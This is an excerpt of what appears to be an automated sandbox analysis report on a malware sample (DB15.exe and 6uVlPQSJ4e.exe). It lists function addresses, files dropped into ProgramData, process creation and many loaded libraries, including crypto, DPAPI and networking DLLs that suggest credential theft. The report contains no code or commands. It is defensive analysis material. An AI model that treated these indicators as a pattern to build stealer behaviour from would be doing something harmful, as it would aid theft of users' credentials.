Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_004C8113 17_2_004C8113
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_004021C0 17_2_004021C0
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0040D240 17_2_0040D240
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_004C9343 17_2_004C9343
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0044237E 17_2_0044237E
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_00405447 17_2_00405447
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_00405457 17_2_00405457
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_004084C0 17_2_004084C0
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0050C4E0 17_2_0050C4E0
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_004344FF 17_2_004344FF
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_00449506 17_2_00449506
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0043E5A3 17_2_0043E5A3
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0044B5B1 17_2_0044B5B1
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0040A660 17_2_0040A660
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_00409686 17_2_00409686
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_00406740 17_2_00406740
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_00402750 17_2_00402750
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0040A710 17_2_0040A710
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_00408780 17_2_00408780
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0044D7A1 17_2_0044D7A1
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0042C804 17_2_0042C804
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_00406880 17_2_00406880
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0050C960 17_2_0050C960
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0050C928 17_2_0050C928
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0044D9DC 17_2_0044D9DC
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_004069F3 17_2_004069F3
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0050C988 17_2_0050C988
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0050C9A8 17_2_0050C9A8
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_00449A71 17_2_00449A71
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_00443B40 17_2_00443B40
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0050CB78 17_2_0050CB78
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_00402B80 17_2_00402B80
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_00406B80 17_2_00406B80
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_00409CF9 17_2_00409CF9
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0044ACFF 17_2_0044ACFF
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0040DD40 17_2_0040DD40
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_00427D6C 17_2_00427D6C
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0050CD60 17_2_0050CD60
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0040BDC0 17_2_0040BDC0
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0050CDF0 17_2_0050CDF0
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_00409DFA 17_2_00409DFA
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0050CE58 17_2_0050CE58
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0042CE51 17_2_0042CE51
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_00406EE0 17_2_00406EE0
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_00409F76 17_2_00409F76
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_00420F30 17_2_00420F30
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0050CF28 17_2_0050CF28
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0050CFC0 17_2_0050CFC0
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_00449FE3 17_2_00449FE3
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0050CF90 17_2_0050CF90
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: String function: 00428C81 appears 37 times
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: String function: 02898EC0 appears 57 times
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: String function: 004547A0 appears 33 times
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: String function: 0042F7C0 appears 75 times
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: String function: 0044F23E appears 55 times
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: String function: 00428520 appears 67 times
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: String function: 00454E50 appears 36 times
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: String function: 028A0160 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: String function: 00428C81 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: String function: 02898EC0 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: String function: 004547A0 appears 75 times
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: String function: 0042F7C0 appears 99 times
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: String function: 0044F23E appears 53 times
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: String function: 00428520 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: String function: 00454E50 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: String function: 028A0160 appears 50 times
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4004 -s 10520
Source: 6uVlPQSJ4e.exe, 00000000.00000002.2120090897.0000000000AE2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameWell2 vs 6uVlPQSJ4e.exe
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\gtdirat Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\gtdirat Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\gtdirat Section loaded: msvcr100.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: drprov.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: ntlanman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: davclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: davhlpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: browcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: drprov.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: ntlanman.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: davclnt.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: davhlpr.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: browcli.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: dpapi.dll
